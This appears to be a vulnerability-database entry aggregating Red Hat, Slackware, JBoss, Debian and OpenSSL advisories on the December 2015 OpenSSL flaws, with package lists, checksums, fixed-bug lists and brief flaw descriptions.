x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm
ppc64: openssl-1.0.1e-42.el6_7.1.ppc.rpm openssl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm
s390x: openssl-1.0.1e-42.el6_7.1.s390.rpm openssl-1.0.1e-42.el6_7.1.s390x.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-devel-1.0.1e-42.el6_7.1.s390.rpm openssl-devel-1.0.1e-42.el6_7.1.s390x.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-static-1.0.1e-42.el6_7.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-perl-1.0.1e-42.el6_7.1.s390x.rpm openssl-static-1.0.1e-42.el6_7.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
aarch64: openssl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm openssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm
ppc64: openssl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.1.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-devel-1.0.1e-51.el7_2.1.s390.rpm openssl-devel-1.0.1e-51.el7_2.1.s390x.rpm openssl-libs-1.0.1e-51.el7_2.1.s390.rpm openssl-libs-1.0.1e-51.el7_2.1.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-static-1.0.1e-51.el7_2.1.aarch64.rpm
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-static-1.0.1e-51.el7_2.1.ppc.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-perl-1.0.1e-51.el7_2.1.s390x.rpm openssl-static-1.0.1e-51.el7_2.1.s390.rpm openssl-static-1.0.1e-51.el7_2.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-3194 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-3196 https://access.redhat.com/security/updates/classification/#moderate https://openssl.org/news/secadv/20151203.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4 dpIS/iR9oiOKMXJY5t447ME= =qvLr -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). For more information, see: https://openssl.org/news/secadv_20151203.txt https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196 ( Security fix ) patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 5e45a22283b41aaf4f867918746ebc1d openssl-0.9.8zh-i486-1_slack13.0.txz 0ad74b36ce143d28e15dfcfcf1fcb483 openssl-solibs-0.9.8zh-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: c360d323a2bed57c62d6699b2d4be65e openssl-0.9.8zh-x86_64-1_slack13.0.txz 122240badbfbe51c842a9102d3cfe30f openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 1bf98b27573b20a7de5f6359f3eadbd7 openssl-0.9.8zh-i486-1_slack13.1.txz 2b732f1f29de1cb6078fd1ddda8eb9ec openssl-solibs-0.9.8zh-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: 735c3bbc55902ec57e46370cde32ea4b openssl-0.9.8zh-x86_64-1_slack13.1.txz 483f506f3b86572e60fe4c46a67c226b openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 9af41ba336c64b92d5bbd86c17a93e94 openssl-0.9.8zh-i486-1_slack13.37.txz b83170b9c5ec56b4e2dc882b3c64b306 openssl-solibs-0.9.8zh-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 2220ff161d0bf3635d2dea7caae6e5e7 openssl-0.9.8zh-x86_64-1_slack13.37.txz 17b3e8884f383e3327d5e4a6080634cb openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz
Slackware 14.0 packages: ced42bc3799f2b54aeb3b631a2864b90 openssl-1.0.1q-i486-1_slack14.0.txz 52965f98ee30e8f3d22bde6b0fe7f53b openssl-solibs-1.0.1q-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: cbf49f09bdcebc61cf7fcb2857dc3a71 openssl-1.0.1q-x86_64-1_slack14.0.txz 156911f58b71ee6369467d8fec34a59f openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 36d5f60b634788d4315ffb46ef6d4d88 openssl-1.0.1q-i486-1_slack14.1.txz fc18f566a9a2f5c6adb15d288245403a openssl-solibs-1.0.1q-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 03f1832417a79f73b35180a39ae4fb16 openssl-1.0.1q-x86_64-1_slack14.1.txz bf447792f23deb14e1fe3f008a6b78a7 openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz
Slackware -current packages: 27b2974199a970392ed2192bf4a207a9 a/openssl-solibs-1.0.2e-i586-1.txz 940a7653a6cadb44ce143d3b0e0eaa16 n/openssl-1.0.2e-i586-1.txz
Slackware x86_64 -current packages: 8636a45f49d186d505b356b9be66309b a/openssl-solibs-1.0.2e-x86_64-1.txz 87c33a76a94993864a52bfe4e5d5b2f0 n/openssl-1.0.2e-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2012-1148)
Red Hat would like to thank the OpenSSL project for reporting CVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
801648 - CVE-2012-1148 expat: Memory leak in poolGrow 1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service 1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import 1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp() 1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression 1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint 1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code 1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation 1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption 1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1332820 - CVE-2016-4483 libxml2: out-of-bounds read 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass 1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert 1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates 1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI 1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
For the oldstable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u18.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u2.
For the unstable distribution (sid), these problems have been fixed in version 1.0.2e-1 or earlier.
NOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE 0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS PER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS.
BN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)
Severity: Moderate
There is a carry propagating bug in the x86_64 Montgomery squaring procedure. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. For example this can occur by default in OpenSSL DHE based SSL/TLS ciphersuites.
This issue affects OpenSSL version 1.0.2.
OpenSSL 1.0.2 users should upgrade to 1.0.2e
This issue was reported to OpenSSL on August 13 2015 by Hanno Böck. The fix was developed by Andy Polyakov of the OpenSSL development team.
Certificate verify crash with missing PSS parameter (CVE-2015-3194)
Severity: Moderate
The signature verification routines will crash with a NULL pointer dereference if presented with an ASN.1 signature using the RSA PSS algorithm and absent mask generation function parameter. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack.
This issue affects OpenSSL versions 1.0.2 and 1.0.1.
OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q
This issue was reported to OpenSSL on August 27 2015 by Loïc Jonas Etienne (Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL development team. This structure is used by the PKCS#7 and CMS routines so any application which reads PKCS#7 or CMS data from untrusted sources is affected. SSL/TLS is not affected.
This issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q OpenSSL 1.0.0 users should upgrade to 1.0.0t OpenSSL 0.9.8 users should upgrade to 0.9.8zh
This issue was reported to OpenSSL on November 9 2015 by Adam Langley (Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen Henson of the OpenSSL development team.
This issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously listed in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0 and has not been previously fixed in an OpenSSL 1.0.0 release.
The fix was developed by Dr. Stephen Henson of the OpenSSL development team.
Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)
Severity: Low
If a client receives a ServerKeyExchange for an anonymous DH ciphersuite with the value of p set to 0 then a seg fault can occur leading to a possible denial of service attack.
This issue affects OpenSSL version 1.0.2.
OpenSSL 1.0.2 users should upgrade to 1.0.2e
This issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these versions will be provided after that date. In the absence of significant security issues being identified prior to that date, the 1.0.0t and 0.9.8zh releases will be the last for those versions. Users of these versions are advised to upgrade.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20151203.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": 